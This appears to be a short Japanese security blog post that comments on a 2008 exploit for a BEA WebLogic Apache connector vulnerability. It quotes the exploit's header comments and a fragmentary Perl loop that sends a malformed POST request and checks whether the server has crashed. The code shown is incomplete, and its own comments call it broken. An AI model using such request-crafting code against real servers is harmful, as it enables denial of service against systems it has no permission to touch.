Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

IT セキュリティ

こんなコメントが充実しているExploitなコードも珍しいwwwwwwwwwwwwwwwwwww

てか、もうWebLogic脆弱性を攻撃するようなExploitが出てるんだ!!!
#// Bea Weblogic -- Apache Connector Remote Exploit +-1day 
#// Should stack break latest Windows Server 2003 <address space randomization> 
#// BIG THANKS TO #// "dong-hun you"(Xpl017Elz) in INetCop - for his paper 
#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)" 
#// His technique works fine against Windows 2003 latest version. 
#// 
#// The code is broken, since I am chilling out for now 
#// SKIDDI BULLETPROOF 
#// You may fixup the DoS Code, Windows Code Works on English OSs 
#// KingCope -- July/2008

この辺が肝かw

print $sock "POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
while(read($sock,$_,100)) { 
  my $dosagain = 0; 

  if ($dosagain eq 1) { 
     "Server is down now\n";
     exit;
  }

  if ($_ =~ /Server/) { 
     print ".";
     $dosagain = 1;
     next;
     }
  }

screenshot